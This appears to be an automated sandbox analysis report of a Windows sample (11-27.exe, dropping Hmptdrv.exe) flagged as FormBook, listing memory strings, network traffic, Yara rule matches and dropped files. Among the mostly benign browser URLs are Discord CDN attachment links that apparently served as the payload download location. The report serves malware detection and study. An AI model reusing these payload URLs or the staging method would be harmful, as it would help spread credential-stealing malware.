Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp, msdt.exe, 00000006.00000002.605314141.0000000000510000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpW
Source: msdt.exe, 00000006.00000002.605314141.0000000000510000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpp
Source: msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpK
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpacLMEMp
Source: msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp%
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp5
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: msdt.exe, 00000006.00000002.610514079.0000000004F59000.00000004.00000001.sdmp	String found in binary or memory: http://www.systemmigrationservices.com
Source: msdt.exe, 00000006.00000002.610514079.0000000004F59000.00000004.00000001.sdmp	String found in binary or memory: http://www.systemmigrationservices.com/gwg/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.415239015.0000000002D70000.00000004.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.disc8
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.415239015.0000000002D70000.00000004.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discorda
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attac
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/74
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/77975373507710160
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/7817352336$
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/78173523363220
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735233632206868/Hmptxxx
Source: Hmptdrv.exe, 00000005.00000002.428937073.00000000007FF000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735233632206868/HmptxxxP
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/7817352336322068688
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735233632206868d
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/7817352336P
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/78L
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/7797537350771X
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp, msdt.exe, 00000006.00000003.412844760.000000000053C000.00000004.00000001.sdmp, msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1CQ
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.415239015.0000000002D70000.00000004.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/2
Source: 11-27.exe, 00000000.00000002.414643524.00000000008AA000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp	String found in binary or memory: https://discordapp.com/
Source: Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: https://discordapp.com/x
Source: Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: msdt.exe, 00000006.00000003.407010469.000000000053C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/b67LMEMh
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: Yara match

File source: Process Memory Space: Hmptdrv.exe PID: 6152, type: MEMORY

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\msdt.exe	Dropped file: C:\Users\user\AppData\Roaming\7N4802EQ\7N4logri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe	Dropped file: C:\Users\user\AppData\Roaming\7N4802EQ\7N4logrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
